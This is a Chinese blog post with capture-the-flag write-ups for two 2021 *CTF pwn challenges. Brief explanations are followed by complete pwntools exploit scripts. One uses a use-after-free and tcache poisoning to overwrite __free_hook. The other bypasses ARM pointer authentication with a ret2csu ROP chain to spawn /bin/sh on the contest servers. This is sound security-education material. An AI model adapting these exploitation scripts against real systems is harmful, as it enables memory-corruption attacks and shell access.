2021-starCTF

2021-01-31

字数统计: 949字 | 阅读时长≈ 5分

2021 star CTF题解，又学到了很多新知识。

babyheap

存在一个uaf漏洞，在fastbin中布置两个堆块后，申请大块堆合并。再利用堆重叠实现修改tcache的next指针，修改free_hook来getshell。

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])
filename = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process(filename)
    libc = ELF(libcname)
    elf = ELF(filename)
else:
    p = remote("52.152.231.198", 8081)
    libc = ELF('./libc_64.so.6')
    elf = ELF(filename)

def Add(idx, size):
    p.sendlineafter('>> \n', str(1))
    p.sendlineafter('input index\n', str(idx))
    p.sendlineafter('input size\n', str(size))

def Delete(idx):
    p.sendlineafter('>> \n', str(2))
    p.sendlineafter('input index\n', str(idx))

def Edit(idx, content):
    p.sendlineafter('>> \n', str(3))
    p.sendlineafter('input index\n', str(idx))
    p.sendafter('input content\n', content)

def Show(idx):
    p.sendlineafter('>> \n', str(4))
    p.sendlineafter('input index\n', str(idx))

def AddName(name):
    p.sendlineafter('>> \n', str(5))
    p.sendlineafter('your name:\n', str(name))

def ShowName():
    p.sendlineafter('>> \n', str(6))

def Pwn():
    for i in range(9):
        Add(i, 0x20)
    Add(9, 0x60)
    for i in range(9):
        Delete(i)

    Show(1)
    heap_addr = u64(p.recvuntil('\n',drop=True).ljust(8, b'\x00'))
    print('heap_addr',hex(heap_addr))

    payload = 'a'
    AddName(payload)
    Show(7)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8, b'\x00')) - 176- libc.sym['__malloc_hook'] - 0x10
    print('libc_addr:', hex(libc_addr))
    system_addr = libc_addr + libc.sym['system']
    free_hook = libc_addr + libc.sym['__free_hook']
    print('system_addr:', hex(system_addr))

    Add(10, 0x50)   #fake chunk
    payload = p64(0)*3+p64(0)+p64(0x71)
    Edit(10, payload)
    Delete(8)
    payload = p64(0)*3+p64(0)+p64(0x71)+p64(free_hook-0x8)
    Edit(10, payload)
    Add(11, 0x60)
    Add(12, 0x60)
    #gdb.attach(p, 'bp $rebase(0xdcf)')
    Edit(12, p64(system_addr))
    payload = p64(0)*3+p64(0)+p64(0x71)+'/bin/sh\x00'
    Edit(10, payload)
    Delete(8)

    p.interactive()

Pwn()

babypac

arm架构存在一个溢出的后门函数，在name中布置进入溢出函数的数字和csu的目标地址。利用lock上溢加密name中的数据，利用show输出加密后的name，解密得到经过pac加密的目标地址，随后在溢出函数的返回地址填上经过pac加密的目标地址实现ROP。

..Alex:
from pwn import *

context.arch="aarch64"
context.terminal = ['tmux','split','-h']
context.log_level = 'debug'

elf = ELF('./chall')
debug = 0
libc = ELF("./lib/libc.so.6")

if not debug:
    p = remote("52.255.184.147", 8080)
elif debug == 1:
    p = process(["qemu-aarch64", "-L", "/home/Sndav/CTF/starCTF2021/babypac", "./chall"])
else:
    p = process(["qemu-aarch64", "-g", "12341", "-L", "/home/Sndav/CTF/starCTF2021/babypac", "./chall"])

def add(iden):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('identity: ', str(iden))

def show():
    p.sendlineafter('>> ', str(3))

def lock(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('idx: ', str(idx))


def auth(idx):
    p.sendlineafter('>> ', str(4))
    p.sendlineafter('idx: ', str(idx))

csu_front_addr = 0x400fd8
csu_end_addr = 0x400ff8
def csu(call_addr, arg0, arg1, arg2, jmp_addr):
    payload = p64(0)+p64(jmp_addr)+p64(0)+p64(1) #x29, x30, x19, x20
    payload += p64(call_addr)+p64(arg0) #x21, x22
    payload += p64(arg1)+p64(arg2)  #x23, x24
    return payload

def brute(salt, ha):
    m = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
    for i1 in m:
        for i2 in m:
            for i3 in m:
                for i4 in m:
                    if hashlib.sha256(i1+i2+i3+i4+salt).hexdigest() == ha:
                        print i1+i2+i3+i4
                        return i1+i2+i3+i4

def temp(s, e):
    return ((1 << e)-1)-((1 << s)-1)

def re(n):
    i = 64
    while i > 0:
        n = n ^ ((n & temp(max(0, i-13), i)) >> 13)
        n = n & ((1 << 64)-1)
        i = i-13

    i = 0
    while i < 64:
        n = n ^ ((n & temp(i, min(i+31, 64))) << 31)
        n = n & ((1 << 64)-1)
        i = i+31
    
    i = 64
    while i > 0:
        n = n ^ ((n & temp(max(0, i-11), i)) >> 11)
        n = n & ((1 << 64)-1)
        i = i-11

    i = 0
    while i < 64:
        n = n ^ ((n & temp(i, min(i+7, 64))) << 7)
        n = n & ((1 << 64)-1)
        i = i+7
    
    return n

def pwn():
    data = p.recvuntil('\n')
    #print data
    salt,hs = data.split('==')
    salt = salt[12:-1]
    hs = hs[1:-2]
    cip = brute(salt, hs)
    p.sendline(cip)
    
    p.recvuntil("input your name:")
    p.sendline(p64(csu_end_addr)+p64(0)+p64(0x10A9FC70042)+p64(0))

    add(0x400ff8)
    lock(-2)
    show()
    data = p.recvuntil('\n')
    print(len(data[6:-1]))
    pac = u64(data[6:-2])
    print('pac:',pac)
    csu_end = re(pac)
    print("csu_end",hex(csu_end))

    lock(-1)
    auth(-1)
    #csu
    puts_got = elf.got['puts']
    print_got = elf.got['printf']
    read_got = elf.got['read']
    atoi_got = elf.got['atoi']
    name_addr = 0x412030
    
    payload = 'a'*0x20+p64(0)+p64(csu_end)+csu(print_got, puts_got, 0x1000, 7, csu_front_addr)
    payload += csu(read_got, 0, name_addr, 0x20, csu_front_addr)
    payload += csu(name_addr, name_addr+8, 0x10, 0x0, csu_front_addr)

    p.send(payload)
    libc_addr = u64(p.recv(3).ljust(8, '\x00'))+0x4000000000-libc.sym['puts']
    print("libc_addr:",hex(libc_addr))
    system_addr = libc_addr+libc.sym['system']
    print('system:',hex(system_addr))

    p.sendline(p64(system_addr)+'/bin/sh\x00')
    p.interactive()
pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2021/01/31/2021-starCTF/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！